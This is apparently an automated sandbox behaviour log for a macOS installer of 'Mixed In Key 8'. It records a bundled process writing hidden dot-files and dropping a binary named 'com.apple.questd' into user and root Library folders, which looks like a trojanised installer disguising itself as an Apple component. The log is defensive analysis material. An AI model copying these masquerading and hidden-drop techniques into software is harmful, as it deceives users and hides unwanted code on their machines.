              Source: /usr/bin/osascript (PID: 839)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 839)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 781)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 781)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 785)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 785)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 789)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 789)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 793)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 793)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 813)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 813)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 831)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 831)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 851)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 851)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 855)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 855)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 859)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 863)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 863)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 867)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
              Source: /usr/bin/osascript (PID: 867)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
              Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 732)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plistJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)File written: /Users/ben/Library/.O6a3uE2h3
              Source: /Library/mixednkey/toolroomd (PID: 756)File written: /Library/AppQuest/com.apple.questdJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)File written: /Users/ben/Library/AppQuest/com.apple.questd
              Source: /Library/AppQuest/com.apple.questd (PID: 768)File written: /private/var/root/Library/.FNm8T2eKLJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)File written: /private/var/root/Library/AppQuest/com.apple.questdJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)File written: /Users/ben/Library/.O6a3uE2h3Jump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)File written: /Users/ben/Library/AppQuest/com.apple.questdJump to dropped file
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)File written: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_BDPiJTJump to dropped file
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)File written: /private/var/run/.dat.nosync02df.49ThaA -> contains PID 735Jump to dropped file
              Source: extracted file from DMG submissionCodeResources XML file: Mixed In Key 8.app\Contents\_CodeSignature\CodeResources
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_hNkiNO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftAppKit.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_AocdHj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreImage.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_ml4gNk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftObjectiveC.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_CYCSVC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftXPC.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_myETqW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCore.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_MDGfb4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreGraphics.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_SuPgKO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftMetal.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_NChyg3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreData.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_zhF7MD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftDispatch.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_16hDMO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftos.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/.BC.T_y0cu4H -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/.BC.T_7YfcYl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/MIKToolkitJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_sDiFyn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/PublicationWindow.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_aHIJdC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/News.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_m6pO1S -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/InfoPlist.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_vmr5Az -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/About.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_HZrLNS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/CopyrightInformation.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_vsWhyG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/Feedback.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_iJh6hr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/EULA.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_SbfZKv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/TooltipPopoverView.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_4MVUOq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/SlideUpPanel.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_zKNlsk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/XButton.pngJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_XQPUja -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_hoDbHL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreFoundation.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_uRjmqv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftDarwin.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/.BC.T_Y4P3Ft -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_h2L2iD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/MIKMIDIPort_SubclassMethods.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_hbF55D -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/MIKMIDIEventIterator.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/.BC.T_QaupMP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/MIKMIDIJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/.BC.T_Zu1bJu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_xGT9is -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDeviceManager.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_pc4y9k -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTextEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_A7yF28 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIResponder.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_gPXdrl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaKeySignatureEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MqdRIP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICompilerCompatibility.hJump to behavior
